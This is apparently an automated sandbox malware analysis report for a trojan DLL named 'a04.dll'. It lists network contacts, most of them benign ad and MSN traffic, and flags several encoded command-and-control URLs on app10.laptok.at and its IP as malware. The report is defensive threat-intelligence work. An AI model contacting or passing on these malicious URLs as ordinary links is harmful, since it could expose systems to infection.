https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F679db3c1-e62f-47d5-bd90-53b48f4ed0c6_1000x600_9a0f5b727e2a50702107d4e4fbcb72f2.png	0%	Avira URL Cloud	safe
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	0%	URL Reputation	safe
https://ad-delivery.net/px.gif?ch=1&e=0.8749585328117704	0%	Avira URL Cloud	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F171f8b8d6097fca0bfa9b18571e0f954.jpg	0%	Avira URL Cloud	safe
https://onedrive.live.com;OneDrive-App	0%	Avira URL Cloud	safe
http://app10.laptok.at/tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6	100%	Avira URL Cloud	malware
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	0%	URL Reputation	safe
http://app10.laptok.at/iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbI	100%	Avira URL Cloud	malware
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fs3.amazonaws.com%2Fshinez-pictures%2F1617177826938a14141d3bca4cb41620f72354f58c4ff.jpg	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
dart.l.doubleclick.net	172.217.168.38	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
app10.laptok.at	87.106.18.141	true	true	13%, Virustotal, Browse	unknown
prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud	18.197.99.6	true	false	0%, Virustotal, Browse	unknown
a97adde81b00f2ca4.awsglobalaccelerator.com	76.223.111.131	true	false	0%, Virustotal, Browse	unknown
elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com	18.195.217.206	true	false		high
windowsupdate.s.llnwi.net	178.79.242.0	true	false		unknown
ad-delivery.net	172.67.69.19	true	false		unknown
contextual.media.net	95.100.216.34	true	false		high
cs.media.net	95.100.216.34	true	false		high
elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com	18.156.81.187	true	false		high
cm.g.doubleclick.net	142.250.203.98	true	false		high
hblg.media.net	95.100.216.34	true	false		high
lg3.media.net	95.100.216.34	true	false		high
btloader.com	104.26.7.139	true	false		unknown
id.rlcdn.com	35.244.174.68	true	false		high
prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloud	18.156.0.31	true	false		unknown
geolocation.onetrust.com	104.20.184.68	true	false		high
x.bidswitch.net	unknown	unknown	false		unknown
www.msn.com	unknown	unknown	false		high
ad.doubleclick.net	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
ups.analytics.yahoo.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	false		unknown
web.vortex.data.msn.com	unknown	unknown	false		high
rtb.mfadsrvr.com	unknown	unknown	false		unknown
pixel.advertising.com	unknown	unknown	false		high
cvision.media.net	unknown	unknown	false		high
match.adsrvr.org	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://x.bidswitch.net/ul_cb/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1	false	Avira URL Cloud: safe	unknown
https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&apid=UPbaae6187-2775-11ec-83da-02a5fb3287ae&verify=true	false		high
https://rtb.mfadsrvr.com/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F46fb1684-fb46-4b92-97d6-73c06aebbfee_1000x600_bdf0634e74df9e1a3c17cd78afe8adb9.png	false	Avira URL Cloud: safe	unknown
https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fceedb38b7c05f6380193a62666745514.jpg	false	Avira URL Cloud: safe	unknown
https://rtb.mfadsrvr.com/ul_cb/sync?ssp=bidswitch&bidswitch_ssp_id=medianet&bsw_user_id=ed0d0c9d-eb5e-460c-94bd-331d1d38e375	false	Avira URL Cloud: safe	unknown
https://btloader.com/tag?o=6208086025961472&upapi=true	false	URL Reputation: safe	unknown
https://match.adsrvr.org/track/cmb/generic?ttd_pid=8m33zk4&ttd_tpi=1	false		high
https://x.bidswitch.net/sync?ssp=medianet&gdpr=0&gdpr_consent=&gdpr_pd=1	false	Avira URL Cloud: safe	unknown
http://app10.laptok.at/KiETfhAdcEl7/hLoS0_2BEdS/nu4Yf9GnANVyXk/YgUltJ7zs6xEJ2nloxeBs/eATUXgJAO922GcgP/GiUgV17y_2BdX4O/qFWwhpMGMf37wi_2BX/lkJe3cdrN/7WVmaELlUteTQIErFhWc/URRkn6I1CeKadfr0Tg_/2BWPYNHHR_2F2UImJAlhjY/i7YonJ3Ydwnd_/2BgOgiB9/MYuujPMMxg18nymjpE2JqFD/0fVq8D9YsD/phg5UsKLZOQl7kqi1/VTS_2FsAFu3G/3TrEzzwsBKW/3MeaiWTLCHCZlD/OY9S51u3L9nBtrZ_2BZx7/0yqRxDj4x6MboGVE/Q0bFKfsJ98F/gfX	true	Avira URL Cloud: malware	unknown
https://cm.g.doubleclick.net/pixel?cs=1&google_nid=media&google_cm=1&google_hm=Mjc2NjE2MzExNjY4NDE2ODAwMFYxMA%3D%3D&google_sc=1	false		high
http://app10.laptok.at/favicon.ico	true	Avira URL Cloud: malware	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fa6cb1edf-85ae-42d3-8ce3-0c3ef2d08771%2F679db3c1-e62f-47d5-bd90-53b48f4ed0c6_1000x600_9a0f5b727e2a50702107d4e4fbcb72f2.png	false	Avira URL Cloud: safe	unknown
https://ad.doubleclick.net/favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250	false		high
https://id.rlcdn.com/710489.gif	false		high
https://cm.g.doubleclick.net/pixel?cs=1&google_nid=media&google_cm=1&google_hm=Mjc2NjE2MzEyNjY4NDEzODAwMFYxMA%3D%3D&google_sc=1	false		high
https://pixel.advertising.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10	false		high
https://ad-delivery.net/px.gif?ch=1&e=0.8749585328117704	false	Avira URL Cloud: safe	unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F171f8b8d6097fca0bfa9b18571e0f954.jpg	false	Avira URL Cloud: safe	unknown
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	false		high
https://match.adsrvr.org/track/cmf/generic?ttd_pid=8m33zk4&ttd_tpi=1	false		high
https://ups.analytics.yahoo.com/ups/58222/sync?_origin=1&uid=2766163126684138000V10&verify=true	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fs3.amazonaws.com%2Fshinez-pictures%2F1617177826938a14141d3bca4cb41620f72354f58c4ff.jpg	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://searchads.msn.net/.cfm?&&kp=1&	{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/coronareisen	de-ch[1].htm.6.dr	false		high
https://contextualtag.media.net	{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	false		high
https://www.msn.com/de-ch/finanzen/nachrichten/schweizer-arbeitsmarkt-auf-dem-weg-zum-vorkrisennivea	de-ch[1].htm.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na	de-ch[1].htm.6.dr	false		high
https://onedrive.live.com;Fotos	52-478955-68ddb2ab[1].js.6.dr	false	Avira URL Cloud: safe	low
https://www.msn.com/de-ch/sport?ocid=StripeOCID	de-ch[1].htm.6.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.6.dr	false		high
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	52-478955-68ddb2ab[1].js.6.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/auto-nach-unfall-mit-milit%c3%a4rblachen-abgedeckt/ar-AALgoO8?o	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/was-passierte-nur-drei-minuten-nach-dem-start/ar-AAP7LCM?ocid=h	de-ch[1].htm.6.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	52-478955-68ddb2ab[1].js.6.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.6.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/news/other/mann-54-wird-von-wurzelstock-getroffen-und-kommt-ums-leben/ar-A	de-ch[1].htm.6.dr	false		high
https://secure.adnxs.com/clktrb?id=762232	de-ch[1].htm.6.dr	false		high
http://www.reddit.com/	msapplication.xml4.4.dr	false		high
https://www.msn.com/de-ch/news/other/gericht-verurteilt-mehrfachen-raser-zu-30-monaten-freiheitsstra	de-ch[1].htm.6.dr	false		high
https://www.skype.com/	de-ch[1].htm.6.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24545562	de-ch[1].htm.6.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.6.dr	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	52-478955-68ddb2ab[1].js.6.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.6.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	52-478955-68ddb2ab[1].js.6.dr	false		high
https://client-s.gateway.messenger.live.com	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.6.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	52-478955-68ddb2ab[1].js.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.6.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.6.dr	false		high
https://twitter.com/i/notifications;Ich	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.6.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.6.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.6.dr	false		high
http://www.youtube.com/	msapplication.xml7.4.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.6.dr	false		high
https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&hl=de-ch&refer	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/spezialisten-suchen-mit-sonarsonde-in-200-metern-tiefe-nach-ver	de-ch[1].htm.6.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.skype.com/de	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/news/other/schulleitung-warnt-eltern-vor-lebensbedrohlichem-ohnmacht-spiel	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/nachrichten/schweiz/bund-registriert-erneut-weniger-neue-corona-ansteckung	de-ch[1].htm.6.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.6.dr	false		high
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/de-de?"	de-ch[1].htm.6.dr	false	URL Reputation: safe	unknown
https://www.skype.com/de/download-skype	52-478955-68ddb2ab[1].js.6.dr	false		high
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.6.dr	false		high
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	52-478955-68ddb2ab[1].js.6.dr	false		high
https://onedrive.live.com;OneDrive-App	52-478955-68ddb2ab[1].js.6.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.6.dr	false		high
https://clkde.tradedoubler.com/click?p=295926&a=3064090&g=24886692	de-ch[1].htm.6.dr	false		high
http://www.amazon.com/	msapplication.xml.4.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	52-478955-68ddb2ab[1].js.6.dr	false		high
http://app10.laptok.at/tej6GHOV/2OZDNZM15j8d4LuzyBm1CPL/pFWNHMsgBq/Me_2BiCKfGmnsgtGg/Rke8C0lda6	loaddll32.exe, 00000000.00000002.1181563164.0000000001760000.00000002.00020000.sdmp, regsvr32.exe, 00000002.00000002.1182344208.00000000031F0000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.1182967138.0000000003940000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.1182457266.00000000031F0000.00000002.00020000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.twitter.com/	msapplication.xml5.4.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	52-478955-68ddb2ab[1].js.6.dr	false		high
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	false		high
https://outlook.com/	de-ch[1].htm.6.dr	false		high
https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png"	de-ch[1].htm.6.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	false		high
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	iab2Data[2].json.6.dr	false	URL Reputation: safe	unknown
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	52-478955-68ddb2ab[1].js.6.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	{AE6AEE6B-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	false		high
http://app10.laptok.at/iyCuS9ekK6/ZKYlS2pL4_2F6YN5g/m2OzU2ez_2Fk/8F_2BnXwn7_/2BP90eUCGBXbRD/RIrhhRbI	loaddll32.exe, 00000000.00000003.862593152.0000000001258000.00000004.00000001.sdmp, ~DFBF4FFB19552D8CDC.TMP.4.dr, {E5354AB5-2775-11EC-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.6.dr	false		high
https://www.msn.com/de-ch/news/other/die-araberinnen-und-araber-kehren-zur%c3%bcck/ar-AAPbaLO?ocid=h	de-ch[1].htm.6.dr	false		high
https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t	de-ch[1].htm.6.dr	false		high
http://www.nytimes.com/	msapplication.xml3.4.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.6.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
18.195.217.206	elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
172.67.69.19	ad-delivery.net	United States	13335	CLOUDFLARENETUS	false
18.156.81.187	elb-aws-fr-bruges-621602890.eu-central-1.elb.amazonaws.com	United States	16509	AMAZON-02US	false
76.223.111.131	a97adde81b00f2ca4.awsglobalaccelerator.com	United States	16509	AMAZON-02US	false
151.101.1.44	tls13.taboola.map.fastly.net	United States	54113	FASTLYUS	false
104.26.7.139	btloader.com	United States	13335	CLOUDFLARENETUS	false
104.20.184.68	geolocation.onetrust.com	United States	13335	CLOUDFLARENETUS	false
18.197.99.6	prod.ups-eu-central-1.aolp-ds-prd.aws.oath.cloud	United States	16509	AMAZON-02US	false
18.156.0.31	prod.ups-ats.eu-central-1.aolp-ds-prd.aws.oath.cloud	United States	16509	AMAZON-02US	false
87.106.18.141	app10.laptok.at	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	true
35.244.174.68	id.rlcdn.com	United States	15169	GOOGLEUS	false
142.250.203.98	cm.g.doubleclick.net	United States	15169	GOOGLEUS	false
172.217.168.38	dart.l.doubleclick.net	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	498854
Start date:	07.10.2021
Start time:	15:50:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 12m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	a04.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.winDLL@21/140@24/13
EGA Information:	Failed
HDC Information:	Successful, ratio: 31.9% (good quality ratio 30.7%) Quality average: 80.5% Quality standard deviation: 27.6%
HCA Information:	Successful, ratio: 69% Number of executed functions: 90 Number of non-executed functions: 58
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.82.209.183, 95.100.218.79, 104.94.89.6, 204.79.197.203, 131.253.33.200, 13.107.22.200, 2.20.178.18, 2.20.178.16, 65.55.44.109, 131.253.33.203, 204.79.197.222, 95.100.216.34, 152.199.19.161, 20.82.210.154, 20.50.102.62, 2.20.178.24, 2.20.178.33, 20.54.110.249, 40.112.88.60 Excluded domains from analysis (whitelisted): fp.msedge.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a-0003.dc-msedge.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, a-0019.a-msedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, a-0019.standard.a-msedge.net, arc.trafficmanager.net, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a1999.dscg2.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:53:12	API Interceptor	1x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
172.67.69.19	3JWv5bYojD.dll	Get hash	malicious	Browse
	3JWv5bYojD.dll	Get hash	malicious	Browse
	jLluep47xI.dll	Get hash	malicious	Browse
	jqzMAYCER2.dll	Get hash	malicious	Browse
	TooltabExtension.dll	Get hash	malicious	Browse
	EQfXW3UETC.dll	Get hash	malicious	Browse
	tb_unpacked_21_10_5.dll	Get hash	malicious	Browse
	33kndyJJvJ.exe	Get hash	malicious	Browse
	LvdXN6pHuo.dll	Get hash	malicious	Browse
	255nKrnNXJ.dll	Get hash	malicious	Browse
	1234.dll	Get hash	malicious	Browse
	IuUny1eqO7.dll	Get hash	malicious	Browse
	HjvMyXdYDc.dll	Get hash	malicious	Browse
	bazar.dll	Get hash	malicious	Browse
	KANve4zs8b.dll	Get hash	malicious	Browse
	DOaKbJHRfv.dll	Get hash	malicious	Browse
	Hya8QBERWA.dll	Get hash	malicious	Browse
	Afv2MaL8ZK.dll	Get hash	malicious	Browse
	jib5.dll	Get hash	malicious	Browse
	eIqCS9Cchl.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
tls13.taboola.map.fastly.net	TsozeiN4tT.dll	Get hash	malicious	Browse	151.101.1.44
	3JWv5bYojD.dll	Get hash	malicious	Browse	151.101.1.44
	3JWv5bYojD.dll	Get hash	malicious	Browse	151.101.1.44
	yMPBuPqE33.dll	Get hash	malicious	Browse	151.101.1.44
	1xjJ6fFB1b.dll	Get hash	malicious	Browse	151.101.1.44
	TooltabExtension.dll	Get hash	malicious	Browse	151.101.1.44
	jqzMAYCER2.dll	Get hash	malicious	Browse	151.101.1.44
	TooltabExtension.dll	Get hash	malicious	Browse	151.101.1.44
	SBnLImhV6r.dll	Get hash	malicious	Browse	151.101.1.44
	5ch8dv7ceO.dll	Get hash	malicious	Browse	151.101.1.44
	0YM5hwP6b3.dll	Get hash	malicious	Browse	151.101.1.44
	N8OeefFV0T.dll	Get hash	malicious	Browse	151.101.1.44
	EQfXW3UETC.dll	Get hash	malicious	Browse	151.101.1.44
	TvZcNQ8W30.dll	Get hash	malicious	Browse	151.101.1.44
	triage_dropped_file.dll	Get hash	malicious	Browse	151.101.1.44
	microsoftExcelEarth.dll	Get hash	malicious	Browse	151.101.1.44
	lilu6[1].dll	Get hash	malicious	Browse	151.101.1.44
	DAQzQ6FyNs.dll	Get hash	malicious	Browse	151.101.1.44
	v9ZD101UF6.exe	Get hash	malicious	Browse	151.101.1.44
	1234.dll	Get hash	malicious	Browse	151.101.1.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	OR3ogRDyRh.exe	Get hash	malicious	Browse	172.67.176.216
	6dfce00750c09d7a9927dab4bed6b81a4043fab36fba5.exe	Get hash	malicious	Browse	104.21.17.146
	GT09876545678.exe	Get hash	malicious	Browse	172.67.188.154
	Halkbank_Ekstre_1007202187266479387_938938987466.exe	Get hash	malicious	Browse	104.21.19.200
	23678876540200867.exe	Get hash	malicious	Browse	104.21.19.200
	RiU6V5x95m.exe	Get hash	malicious	Browse	172.67.169.55
	1d7aKrNGq7.exe	Get hash	malicious	Browse	104.21.17.146
	TS49YVEABV.html	Get hash	malicious	Browse	104.16.18.94
	mx4lFH48GA.exe	Get hash	malicious	Browse	162.159.134.233
	TpNBqOquYs.exe	Get hash	malicious	Browse	162.159.129.233
	vhPaw5lCuv.exe	Get hash	malicious	Browse	172.67.176.216
	8VNALsC90G.exe	Get hash	malicious	Browse	23.227.38.74
	BSQ4wRQciB.dll	Get hash	malicious	Browse	104.18.114.97
	5sTWnI5RoC.exe	Get hash	malicious	Browse	172.67.176.216
	u6TjeODCFF.exe	Get hash	malicious	Browse	162.159.133.233
	TsozeiN4tT.dll	Get hash	malicious	Browse	104.26.7.139
	3Uzf6tkCcB.exe	Get hash	malicious	Browse	104.21.17.146
	qmskAqQ4H6.exe	Get hash	malicious	Browse	172.67.131.184
	hwIILTIn0n.exe	Get hash	malicious	Browse	172.67.153.94
	kARSx3Wv9S.exe	Get hash	malicious	Browse	104.21.17.146
AMAZON-02US	mips-20211007-1206	Get hash	malicious	Browse	54.126.191.35
	A1ORfMfK1I.exe	Get hash	malicious	Browse	18.139.111.104
	TsozeiN4tT.dll	Get hash	malicious	Browse	18.156.0.31
	RFQ453266433,pdf.exe	Get hash	malicious	Browse	52.88.142.220
	UT3vK4jelb.msi	Get hash	malicious	Browse	52.95.165.51
	l8w9YB1n38.exe	Get hash	malicious	Browse	99.83.154.118
	FedEx_AWB#_224174658447.exe	Get hash	malicious	Browse	3.64.163.50
	CV 10-06-2021.xlsx	Get hash	malicious	Browse	3.123.20.242
	3JWv5bYojD.dll	Get hash	malicious	Browse	3.126.56.137
	3JWv5bYojD.dll	Get hash	malicious	Browse	3.126.56.137
	7fC3FgBEeH	Get hash	malicious	Browse	34.249.145.219
	ZXPInstaller.Setup.exe	Get hash	malicious	Browse	54.249.141.25
	svchost.exe	Get hash	malicious	Browse	13.51.72.213
	Invoice.xlsx	Get hash	malicious	Browse	52.216.166.13
	Invoice.xlsx	Get hash	malicious	Browse	52.217.141.112
	RNIpSzBRVC.exe	Get hash	malicious	Browse	18.185.122.198
	DHL_DELIVERY_ADDRESS_CONFIRMATION.xlsx	Get hash	malicious	Browse	54.179.71.39
	#U266b-Encova-9493556-44518-9493556283243.htm	Get hash	malicious	Browse	3.139.50.24
	RvPCVuHD8f	Get hash	malicious	Browse	34.249.145.219
	USD8390.html	Get hash	malicious	Browse	52.217.175.112

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	TsozeiN4tT.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	3JWv5bYojD.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
	3JWv5bYojD.dll	Get hash	malicious	Browse	18.195.217.206 172.67.69.19 18.156.81.187 76.223.111.131 151.101.1.44 104.26.7.139 104.20.184.68 18.197.99.6 18.156.0.31 35.244.174.68 142.250.203.98 172.217.168.38
